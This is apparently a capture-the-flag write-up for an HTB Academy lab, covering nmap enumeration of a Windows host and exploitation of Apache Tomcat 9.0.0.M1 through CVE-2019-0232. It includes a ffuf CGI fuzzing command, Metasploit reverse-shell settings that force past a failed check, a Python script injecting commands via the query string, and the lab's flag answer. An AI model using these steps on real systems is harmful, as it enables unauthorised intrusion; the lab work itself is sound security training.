During a penetration test against the company Inlanefreight, you have performed extensive enumeration and found the network to be quite locked down and well-hardened. You come across one host of particular interest that may be your ticket to an initial foothold. Enumerate the target host for potentially vulnerable applications, obtain a foothold, and submit the contents of the flag.txt file to complete this portion of the skills assessment.

Questions:

What vulnerable application is running?

                                                                                
┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part1]
└─$ sudo nmap -sV -sC 10.129.98.249 -ox nmap.xml
[sudo] password for sasorirose: 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-05 01:12 UTC
Failed to resolve "nmap.xml".
Failed to resolve "nmap.xml".
Nmap scan report for 10.129.98.249
Host is up (0.24s latency).
Not shown: 990 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_09-01-21  08:07AM                 website_backup
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Freight Logistics, Inc
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=APPS-SKILLS1
| Not valid before: 2025-12-08T11:28:27
|_Not valid after:  2026-06-09T11:28:27
|_ssl-date: 2026-05-05T02:12:15+00:00; +59m14s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: APPS-SKILLS1
|   NetBIOS_Domain_Name: APPS-SKILLS1
|   NetBIOS_Computer_Name: APPS-SKILLS1
|   DNS_Domain_Name: APPS-SKILLS1
|   DNS_Computer_Name: APPS-SKILLS1
|   Product_Version: 10.0.17763
|_  System_Time: 2026-05-05T02:12:04+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open  http          Jetty 9.4.42.v20210604
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.42.v20210604)
8009/tcp open  ajp13         Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.0.M1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-05-05T02:12:10
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 59m13s, deviation: 0s, median: 59m13s

Failed to resolve "nmap.xml".
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.23 seconds

Summary of Nmap scan:

Note on the command: -ox is not a valid output flag (the XML option is -oX, and the case matters), so nmap parsed nmap.xml as a second target, which is what the "Failed to resolve" lines report. No XML file was written; rerun with -oX if the results are needed for other tools.

Target: Windows Server (10.129.98.249), hostname APPS-SKILLS1, build 10.0.17763 (Windows Server 2019 / Windows 10 1809). The DNS and NetBIOS domain names are just the hostname, so it appears to be a standalone host rather than a domain member.

Critical Findings (Attack Path):

  • Port 21 (FTP): Anonymous login is allowed and a website_backup entry (dated 09-01-21) is listed. Download it and hunt for hard-coded credentials and configuration files.
  • Port 8080 (Apache Tomcat 9.0.0.M1): The primary exploitation target. 9.0.0.M1 is the first 9.x milestone build (2015) and falls inside the affected range of many published Tomcat CVEs, so version-based exploit research comes first; if the FTP backup yields Manager credentials, logging into the Tomcat Manager on 8080 and deploying a WAR reverse shell is the fallback route.
  • Port 8009 (AJP): Tomcat 9.0.0.M1 through 9.0.30 are affected by Ghostcat (CVE-2020-1938), which reads files under the web application root (for example WEB-INF/web.xml) over AJP; it only becomes code execution if the application also accepts file uploads.

Secondary Web Targets:

  • Port 8000 (Jetty 9.4.42): robots.txt disallows everything under /, which hides nothing from a directory brute-force; fuzz it as well.
  • Port 80 (IIS 10.0): Standard company website ("Freight Logistics, Inc."). TRACE is enabled, which is worth recording but is not a foothold. Fuzz for hidden directories if Tomcat fails.

Hold for Later (Requires Credentials):

  • Ports 445 (SMB), 3389 (RDP), 5985 (WinRM): Use these for remote access after valid usernames and passwords turn up. SMB reports message signing enabled but not required, a hardening finding worth noting in the report.

Answer: Tomcat

What port is this application running on?

Answer: 8080

What version of the application is in use?

Answer: 9.0.0.M1

Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.

Next, let's dig deeper into the Tomcat service first; if nothing turns up there, we continue enumerating the other services.

Googling for PoCs and CVEs related to this version.

I checked for RCE exploits for Apache Tomcat 9.0.0.M1 and found a Rapid7 article that seemed promising:

https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2019-0232/

That led me to google for a CVE-2019-0232 PoC, and I found

https://github.com/setrus/CVE-2019-0232

which told me there was a Metasploit module for this exploit, but ALSO reminded me that I need to fuzz for CGI scripts.

Background on the bug: CVE-2019-0232 affects Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 running on Windows with the CGI servlet enabled and enableCmdLineArguments set to true. A query string that contains no "=" is treated as CGI command-line arguments and appended to the script's command line, and because Windows ultimately runs a .bat file through cmd.exe, a "&" in that argument list terminates the script invocation and starts a second command. The fix (9.0.18 onward) rejects decoded arguments that contain characters outside a safe pattern; on older versions the mitigation is enableCmdLineArguments=false. Exploitation therefore needs an existing batch script under the CGI mapping, which is why the next step is fuzzing for one.

Running ffuf to find CGI scripts (note that the target's address had changed to 10.129.99.6 by this point):

┌──(sasorirose㉿kazekageiii)-[~/…/HTB_Academy/Attacking_Common_Application/Skils_Assessments/part1]
└─$ ffuf -u http://10.129.99.6:8080/cgi/FUZZ.bat -w /usr/share/dirb/wordlists/common.txt

Setting up the reverse shell in msfconsole:

msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set lhost tun0
lhost => tun0
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set lhost tun0
lhost => tun0
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set rhosts 10.129.99.6
rhosts => 10.129.99.6
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set rport 8080
rport => 8080
msf exploit(windows/http/tomcat_cgi_cmdlineargs) > set targeturi /cgi/cmd.bat
targeturi => /cgi/cmd.bat
msf exploit(windows/http/tomcat_cgi_cmdlineargs) >  run

When I attempted to run it, I got the following error:

Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.

Because I had manually tested the injection myself, I felt comfortable setting ForceExploit to true; when I did, it worked and I got a shell.
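The kind of manual check that justifies overriding a module's check result, as an added example that is not from the original write-up or from the Metasploit module: it sends a harmless echo of a random marker through the CGI argument injection and reports the target vulnerable only if the marker comes back on a line of its own in the response. The script path /cgi/cmd.bat and port 8080 are taken from the write-up; the marker technique, the "+" token separator, the function names and the default target are this example's own assumptions. It needs only the Python standard library.

```python
#!/usr/bin/env python3
"""Marker-based check for CVE-2019-0232 (Tomcat CGIServlet argument injection
on Windows).  Added example; not code from the original write-up.  The script
path and port come from the write-up; everything else is an assumption made
for this example."""
import re
import secrets
import sys
import urllib.error
import urllib.parse
import urllib.request


def build_probe_url(host: str, port: int, script_path: str, command: str) -> str:
    """Build the injection URL for one shell command.

    CGIServlet treats a query string with no '=' as CGI command-line
    arguments: it splits on '+' and URL-decodes each piece, then (with
    enableCmdLineArguments=true) appends the pieces to the script's command
    line.  Windows runs a .bat through cmd.exe, so a leading '&' ends the
    script invocation and starts our command.  Each whitespace-separated
    token of the command becomes its own argument, joined with '+'.  A %20
    inside a single token would keep the space inside one argument, which
    Java then quotes, so spaces are deliberately not percent-encoded here.
    """
    tokens = command.split()
    encoded = "+".join(urllib.parse.quote(tok, safe="") for tok in tokens)
    return f"http://{host}:{port}{script_path}?&{encoded}"


def check_response(body: str, marker: str) -> bool:
    """True only if the marker appears on a line by itself, i.e. `echo` ran.

    A marker that merely appears inside an error page quoting our request
    URL (".../cmd.bat?&echo+<marker>") does not count, so reflected input
    cannot produce a false positive.
    """
    return re.search(rf"^{re.escape(marker)}\s*$", body, re.MULTILINE) is not None


def probe(host: str, port: int = 8080, script_path: str = "/cgi/cmd.bat",
          timeout: float = 10.0) -> dict:
    """Send the echo probe and return what was observed."""
    marker = secrets.token_hex(8)  # random, so static page content cannot fake a hit
    url = build_probe_url(host, port, script_path, f"echo {marker}")
    result = {"url": url, "status": None, "vulnerable": False, "error": None}
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            result["status"] = resp.status
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        # A 4xx/5xx still carries a body; Tomcat may answer 500 when the
        # script prints no CGI headers, so inspect that body anyway.
        result["status"] = exc.code
        body = exc.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError) as exc:
        result["error"] = str(exc)
        return result
    result["vulnerable"] = check_response(body, marker)
    return result


if __name__ == "__main__":
    # Default target is the address used in the write-up (assumption).
    target = sys.argv[1] if len(sys.argv) > 1 else "10.129.99.6"
    print(probe(target))
```

A True "vulnerable" field means the "&echo" injected via the query string actually executed on the host, which is the evidence that backs "set ForceExploit true"; a 404 with no marker means the script path is wrong and the wordlist, not the exploit, needs revisiting.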

Use the shell command to drop from Meterpreter to a system shell, switch to PowerShell, and read flag.txt from the Administrator desktop.

Answer: f55763d31a8f63ec935abd07aee5d3d0